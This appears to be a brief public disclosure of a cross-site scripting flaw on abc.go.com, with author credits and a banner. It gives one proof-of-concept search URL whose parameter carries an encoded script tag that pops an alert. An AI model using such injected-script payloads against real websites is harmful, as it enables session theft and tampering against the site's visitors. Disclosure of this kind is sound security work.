The abc.go.com site suffers from a cross site scripting vulnerability.
b1f269845ed280cb2f3cb12b4bfc595e165e2f5514fe02cb64bc8c8e4e7ec2fd
________ .__.__ _______ .____ _____ ___. ________
\_____ \______ _____|__| | \ _ \ ____ | | _____ / \\_ |__ \______ \ _____
_(__ <\____ \/ ___/ | | / /_\ \ / \| | \__ \ / \ / \| __ \ | | \\__ \
/ \ |_> >___ \| | |_\ \_/ \ | \ |___ / __ \_/ Y \ \_\ \| ` \/ __ \_
/______ / __/____ >__|____/\_____ /___| /_______ (____ /\____|__ /___ /_______ (____ /
\/|__| \/ \/ \/ \/ \/ \/ \/ \/ \/
abc.go.COM XSS vulnerability
vendor: www.abc.go.com
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: www.epsilonlambda.co.cc
------------------------------------------------------------------------------------------------------------------------------------------------------------
* XSS vulnerability
1. Demo iframe injection:
http://abc.go.com/search?search=%22%3E%3Cscript%3Ealert%28%22hi%22%29;%3C/script%3E
------------------------------------------------------------------------------------------------------------------------------------------------------------
Thanks to side-effects and greets to r007ki7 and my love taashu.